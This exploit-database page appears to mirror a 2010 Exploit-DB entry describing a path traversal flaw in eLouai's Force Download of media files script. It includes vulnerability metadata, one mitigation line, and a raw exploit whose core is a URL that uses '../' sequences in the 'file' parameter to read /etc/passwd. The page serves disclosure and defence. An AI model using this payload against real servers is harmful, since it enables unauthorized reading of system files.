header-logo
Suggest Exploit
vendor:
Force Download of media files script
by:
v1R00Z
7,5
CVSS
HIGH
Path Traversal
22
CWE
Product Name: Force Download of media files script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Ubuntu 10.10
2010

eLouai’s Force Download of media files script

eLouai's Force Download of media files script is vulnerable to path traversal, which allows an attacker to access arbitrary files and directories stored on the web server. By manipulating the 'file' parameter in a malicious manner, an attacker can traverse the file system to access sensitive files and directories.

Mitigation:

Input validation should be used to prevent path traversal attacks. All user-supplied input should be validated and filtered for malicious characters.
Source

Exploit-DB raw data:

+---------------------------------------------------------------------------------------------+

			          __    _______  _______  _______  _______ 
			|\     /|/  \  (  ____ )(  __   )(  __   )/ ___   )
			| )   ( |\/) ) | (    )|| (  )  || (  )  |\/   )  |
			| |   | |  | | | (____)|| | /   || | /   |    /   )
			( (   ) )  | | |     __)| (/ /) || (/ /) |   /   / 
			 \ \_/ /   | | | (\ (   |   / | ||   / | |  /   /  
			  \   /  __) (_| ) \ \__|  (__) ||  (__) | /   (_/\
 			   \_/   \____/|/   \__/(_______)(_______)(_______/
                                                   GREETINGS TO ALL evilZONE.ORG MEMBERS
  	
+---------------------------------------------------------------------------------------------+		
|
|[+] Exploit Title:  eLouai's Force Download of media files script														
|[+] Date: 2010-11-02
|[+] Author  : v1R00Z
|[+] Software Link: http://www.hotscripts.com/listing/elouais-force-download-script/
|[+] Tested on: Ubuntu 10.10
|[+] Contact : v_1_r@hotmail.com	
|[+] Website : http://evilzone.org/
|[+] Greeting: Evilzone, intern0t Cr3w
|
|[+] Exploit :
| 
|http://www.yoursite.com/force-download.php?file=../../../../etc/passwd
|
|											       |				
+----------------------------------------------------------------------------------------------+

Navigation

Suggest Exploit

Services By CQR